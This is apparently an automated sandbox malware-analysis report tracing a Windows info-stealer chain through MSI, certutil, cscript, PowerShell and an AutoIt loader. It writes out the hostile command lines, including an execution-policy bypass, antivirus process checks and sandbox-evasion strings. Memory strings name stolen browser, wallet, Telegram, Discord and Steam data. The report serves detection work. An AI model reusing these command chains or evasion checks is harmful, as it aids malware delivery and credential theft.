            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
            Source: Corrections.com, 0000001A.00000003.2335230386.0000000000E1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5056Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4714Jump to behavior
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB1E4.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI619D.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI614E.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAF01.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAE63.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI60C0.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAF50.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAFB0.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB1A5.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAF80.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comDropped PE file which has not been started: C:\ProgramData\37QQIEKNGVAA\QQ9RQQJump to dropped file
            Source: C:\Windows\Installer\MSI64FB.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-35497
            Source: C:\Windows\Installer\MSI64FB.tmpAPI coverage: 6.0 %
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comAPI coverage: 3.7 %
            Source: C:\Windows\System32\msiexec.exe TID: 7520Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 7632Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F93FC4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF749F93FC4
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406301 FindFirstFileW,FindClose,16_2_00406301
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_00FADC54
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_00FBA087
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_00FBA1E2
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FAE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,26_2_00FAE472
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,26_2_00FBA570
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB66DC FindFirstFileW,FindNextFileW,FindClose,26_2_00FB66DC
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F7C622 FindFirstFileExW,26_2_00F7C622
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,26_2_00FB73D4
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB7333 FindFirstFileW,FindClose,26_2_00FB7333
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FAD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_00FAD921
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F45FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,26_2_00F45FC8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\628056\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\628056
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
            Source: powershell.exe, 00000009.00000002.2118502891.0000017A75C90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs error object that encapsulates what is in CIM_Error as well as includes error code, errorCategory, errorMessage and errorType.ailure of a CIM Operation. Instances of this type MAY be included as part of the response to a CIM Operation.a/
            Source: Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVM
            Source: powershell.exe, 00000009.00000002.2122203319.0000017A76161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW v
            Source: powershell.exe, 00000009.00000002.2122203319.0000017A761A8000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3002616459.0000000000E03000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004594101.0000000003966000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3003785800.000001DA23A43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3003737459.000001DA23A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3005719464.000001DA2905A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVMware
            Source: Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 12.1960009dd8757fc4c7a65dceef295f6e0INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d %d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBF4FF BlockInput,26_2_00FBF4FF
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F7DB38 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF749F7DB38
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F527B8 GetLastError,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF749F527B8
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,16_2_00406328
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F65058 mov eax, dword ptr fs:[00000030h]26_2_00F65058
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F421E0 GetProcessHeap,4_2_00007FF749F421E0
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI64FB.tmp "C:\Windows\Installer\MSI64FB.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KingSoft\1.bat"Jump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F7DB38 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF749F7DB38
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F78CE8 SetUnhandledExceptionFilter,4_2_00007FF749F78CE8
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F78B00 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF749F78B00
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F78104 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF749F78104
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F72992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00F72992
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F60BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00F60BAF
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F60D45 SetUnhandledExceptionFilter,26_2_00F60D45
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F60F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00F60F91

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Bypasses PowerShell execution policy
            Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1"
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FA1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,26_2_00FA1B4D
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F472B0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetProcessId,AllowSetForegroundWindow,GetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,AttachThreadInput,WaitForSingleObject,GetExitCodeProcess,4_2_00007FF749F472B0
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FABBED SendInput,keybd_event,26_2_00FABBED
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FAECD0 mouse_event,26_2_00FAECD0
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -decode -f C:\Users\user\AppData\Local\Temp\11808.ps1 C:\Users\user\AppData\Local\Temp\11808.ps1Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs"Jump to behavior
            Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 628056
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cleared" Penalties
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Corrections.com u
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FA14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,26_2_00FA14AE
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FA1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,26_2_00FA1FB0
            Source: Corrections.com, 0000001A.00000000.2134912772.0000000001003000.00000002.00000001.01000000.0000000D.sdmp, Appeals.16.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Corrections.comBinary or memory string: Shell_TrayWnd
